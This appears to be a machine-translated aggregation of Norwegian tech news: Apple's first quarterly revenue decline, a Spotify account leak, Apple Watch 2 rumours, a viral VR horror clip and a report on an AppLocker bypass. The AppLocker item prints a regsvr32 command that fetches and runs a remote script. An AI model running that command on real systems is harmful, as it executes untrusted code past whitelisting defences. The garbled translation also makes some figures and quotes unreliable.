Morningstar sees Apple as rails – OBI Online

Apple is hard punished on Wall Street, and pulls down over seven percent to $ 96.79 on Wednesday morning in New York.

The reaction comes after the company presented quarterly after the close yesterday. Revenues of $ 50.6 billion in Apple’s accounting Q2 was 13 percent lower than the same period last year, representing the first quarterly decline in earnings since 2003.

Apple CEO Tim Cook admits that quarter has been hectic and challenging, and in the short term looks headwinds to continue – both macroeconomic and currency front.

– Viewing an Apple shining

Morningstar analyst Brian Colello argues in an update that he “sees Apple as shining”.

– the guidance for Q3 was disappointing on several fronts. Whatever we think iPhone business and iOS ecosystem continues to see structurally healthy out and we do not think Apple’s lack of growth point to a weakened competitive position or loss of customer loyalty, he said.

Colello constantly see for themselves that revenue and iPhone sales come back, perhaps as soon as this coming autumn with iPhone 7.

– Fair value: $ 133

– When the stock traded as low as $ 96, we seem Apple is priced as if the iPhone has already peaked and runs a persistent, secular decline in the face. iPhone look no further as a høyvekstområde for Apple, but we continue to believe that demand will be more resistant than the stock price reflects that.

– So-called “customer switching costs” for iOS ecosystem remains strong and will in our eyes have the potential to increase over time, continues the analyst.

Morningstar reserve its “fair value” point estimate of $ 133 on the stock, and still consider Apple as one of the best investment ideas in technology.

Apple sales down for first time in 13 years – ITavisen.no

Why? iPhone, of course.

The company has gotten cold shower they and industry have been waiting for: iPhone sales declines, and therefore also runs Apple’s earnings down because smart mobile accounts for more than two thirds of the giant’s sales.

Fresh figures in italics.

See also: Apple Watch 2 probably not dependent on the iPhone – therefore it is not a flop.

Cook brag
– We have had a very hectic and challenging quarter. Although we are now seeing a pause in growth, the results show very good execution of our team despite strong macroeconomic headwinds, explained Apple CEO Tim Cook to investors in a conference call this evening Norwegian time.

down for the first time in 13 years
it was expected worse results from Apple, it goes simply not keeping such a winning streak going infinite, but the result is even worse than expected. Therefore sank shareholder value by 8 percent after the news became known (not that the exchange has been gracious when Apple has delivered record figures either).

In the first quarter last year Apple sold 61.2 million iPhone. In the same quarter this year this figure is 51200000 – ie a decline of 16 percent.

iPad sales are not surprisingly also negative, and decreases by 19 percent, from 12.6 million sold last year, the 10.2 this quarter.

See also: Apple: – interest in iPhone SE is sky high.

– Hijacker market
Sales of Mac computers have made it better than Windows market in general in recent years (Apple also believe that they have increased its market share in the PC market), but now they must nevertheless accept that sales are down 12 percent – from 4.6 million sold in the first quarter of 2015, 4,000,000 selling the same quarter this year.

Let’s take a look at sales and profit. Profits in 2015, the first quarter was 13.6 billion dollars. Now this figure of $ 10.5 billion (and therefore decreased by 22 per cent, as mentioned, due to Apple’s iPhone dependency).

The turnover during last year’s first quarter was on staggering $ 58 billion, while the year “only” sold for $ 50.6 billion (down 13 percent).

This is the first two-digit-fall since 2001 . Apple points out that if the dollar had not been so strong, so the company had gotten away with a sales decline of 9 percent .

Apple Music has strengthened somewhat
It will be interesting to see if Apple can lift iPhone SE in non-western countries, especially China, but also where the company needs to see declining sales of 16.8 billion in the first quarter of 2015, 12 , 5 billion led quarter 2016.

Apple’s money bin is growing, it is not true that the company is bleeding, they are good for the staggering $ 232.9 billion – up from 216 billion dollars in the fourth quarter of 2015.

Although Apple has not the tradition to make it especially well within the online services field, they can at least be happy that Apple Music has 13 million paying users, up from 11 million in February this year.

“Spotify password astray” – ITavisen.no

It is perhaps a good idea to update your password.

According to reports from TechCrunch has hundreds of Spotify information like email, username, password, account types and other details, appeared on the website pastebin.

Information leaked
TechCrunch have made contact with a handful of victims through email and they have confirmed that these Spotify accounts were attacked just days ago.

Spotify for its part states that “they have not been hacked” and that “user information is secure.” Thus, it is unclear how these accounts were acquired because they are specific to Spotify and not some random information.

Spotify denies
In addition to include information such as account type, also includes pastebin-post also data when the subscription auto renewal and which country the account was created. accounts are not just limited to the United States.

the people that TechCrunch has been in contact with, said they discovered the attack on several ways. One says that it has been added to new music collection while another says that suddenly appeared music in “recently played songs.”

It is uncertain to say about Spotify actually been hacked, since the company refuses, but TechCrunch seems certain that there must have been some kind of security breach.

it may be wise to update their password, just in case.

Claims Apple Watch “released” from the iPhone – E24

In forteller at andre generasjon Apple Watch vil få kraftige prosessor og slik bli raskere – we I naturlig å forvente.

Apple Watch 2 probably not dependent on the iPhone – therefore it is not a flop – ITavisen.no

Connected to the network itself.

sniff you on an Apple Watch, but has kept you away because it can not connect to the Internet without an iPhone?

Faster and with online support
Then The Wall Street Journal soothe you. They argue namely to know that Apple Watch 2 gets data network support, allowing it to receive messages and calls without help.

Not surprisingly acquires a faster CPU, it will probably many to appreciate, including us (we have not quite faith in apps, but it will no doubt help if they started in less than 15 seconds).

it is also rumored that it will be slimmer than the first-generation – it is something we do do not mind.

This will also make watchOS better
Apple now requiring watchOS apps submitted to the App Store as of June 1 year must run 100 percent on clock hardware, and does not mirror the content from iPhone.

Combine these apps with a snappier smart watch, and the experience is likely to feel far better.

More the industry is questioning Apple Watch sales to Apple, and wonders whether this is the biggest flop of the company, especially since it is the first totally new product under Tim Cook.

Hardly a flop
These figures put the allegations in a slightly different light:

  • Rolex watches sold for $ 4.5 billion in 2015 – Apple Watch turnover of $ 6 billion (estimate)
  • Apple sold six million iPhones in the first year the smart phone was on sale – analysts estimate that Apple has sold 12 million Watch units within one year.
  • Apple Watch stands for 61 percent of global smart watch sales according to IDC

most companies are probably envious of “flopping” so.

Terrified Renate has become a internetthit – iTromsø

Thursday published Karl Jørgen Overå a video on Youtube of her partner Renate Meyer playing a virtual reality horror game called “The Brookhaven Experiment”.

It was NRK Troms who first mentioned clip.

Joining the game

with a VR headset on your head, it feels to the player that participates inside the game itself.

– I have a helmet on head with a video inside themselves that is connected to a game on the computer. Wherever I turn I’m in the game. It runs 360 degrees around me and I hear everything that happens in the game on the ear without outside interference, says Meyer to iTromsø.

And as one can see in the video clip at the top of the case, one can safely say that Meyer misled.

– I’m in a quiet and dark woods with only a pistol and flashlight with me. And I get completely panic when I hear that one of the monsters come creeps up behind me, while I simultaneously attempting to shoot someone who is ahead of me.

Going viral

The hilarious clip shows one terrified and shaky 35-year-old who frantically attempting to kill the monsters as they approach her.

– I have laughed so much of it afterwards. But I was trembling all the time while I was playing and it put in the body long after, she admits facing iTromsø.

Before Meyer should try the game for the first time, she was not allowed by her partner to examine what it was all about because it would be a surprise.

– I live me really into things. We thought we were going to film it and see if we got any views on the video. When we got up on Friday, it had 8,000 views, and four hours later it was up to 120,000 impressions, she said.

Great attention

On Sunday morning has video soon rounded 800,000 impressions, and both national and international media have written about 35-year-old’s reaction to the game.

– It is strange to think. There has been so much fuss and attention surrounding the video that the company that created the game have made contact and said they should send me game for free as soon as it comes on the market. The one we have now is only a demo, says Meyer.

So it only remains to see if she dares to try the game several times.

– There will be a little while until I try it again, but when I get it for free so I suppose I’ll try it. Maybe there will be a new funny video, she says laughingly.

Important Windows security feature can be bypassed with a short command – digi.no

Windows 7 got IT managers a new tool to control what software Windows business users to run on their PCs. AppLocker allows you to restrict access to execution of software on the system by whitelist them for certain user groups, such as administrators. In addition to preventing the employees playing during work hours, this can also prevent the execution of malware.

But last week it became clear that AppLocker can simply bypassed, simply by using a little known functionality regsrv32.exe tool that is built into Windows.

There are security researcher Casey Smith who have discovered this, which has been described by the Register.

Loads via the internet

The not so famous functionality is that regsrv32 can load and run scripts from the internet by typing the parameters something like this:

regsvr32 / s / n / u /i:http://server/file.sct scrobj.dll

URL in the command is replaced with a script such as this concept evidence that Smith has authored. The concept proof started the command line (cmd.exe), but this should in theory be replaced by any program that exists on the PC used, also programs that are not whitelisted by AppLocker.

A collection of potentially more harmful examples, can be found here. In the video below demonstrates the simple concept proof.

Possible countermeasures

Regserv32, according to Casey very good support to load URLs, including support for redirection and HTTPS. In addition it does not require administrator privileges and command over making no changes to the Windows registry.

It is very likely that this can be exploited by malicious people to gain greater control over the system.

one possible measure, until any security fixes are available, according to CSO Online blocking regserver32.exe and possibly regsvr64.exe, firewall to Windows, so that the tool does not get network access. But users should also be possible to add the script in a locally stored file.

The site Brown Hat Security describes vulnerability as extremely serious, since it allows the execution of arbitrary code from a presumed reliable system tools.

Several websites have tried to get Microsoft to comment on the issue, apparently the company has so far not responded to the requests.

Here Renate internet celebrity: – It concerns me that the neighbors did not come – Avisa Nordland

Renate Meyer from Tromso was this weekend internet celebrity almost overnight. A video that was published Thursday has been good entertainment for thousands of YouTube users. The video shows Renate who tries the game The Brookhaven Experiment with 3D glasses on. Renate experiencing the game very realistic, and deservedly so.

The incident was first reported by NRK Troms.

– There has been much attention in recent days. I was even approached by Phosphor Games that makes the game, says Renate Meyer to Nordlys.

She says that she played the demo version, but the developers are so grateful that they’ll send her a free version.

– When the game is completely finished, they will send it to me for free. They thanked so much for your attention, she said.

Ambulatory

In the video we can hear that partner Karl Jørgen Overå is worried about what the neighbors will think. He said among other things:

– If we do not neighbor complaints now, I will be surprised.

But no one came and knocked on the door, and it has the couple flicked on.

– It concerns us nearly that they did not come. I await alive and ambulatory, chuckling Meyer.

Although Renate Meyer was frightened of the game, she’s not going to add headsets and VR glasses away.

– No. , we have more games and we need the use the machine when we acquired this. It’s fun. Glasses tricks the brain into thinking that it is true, she said.

Seven things you should know about the strike today – Aftenposten

5. Hvilke konsekvenser får streiken for turistnæringen?
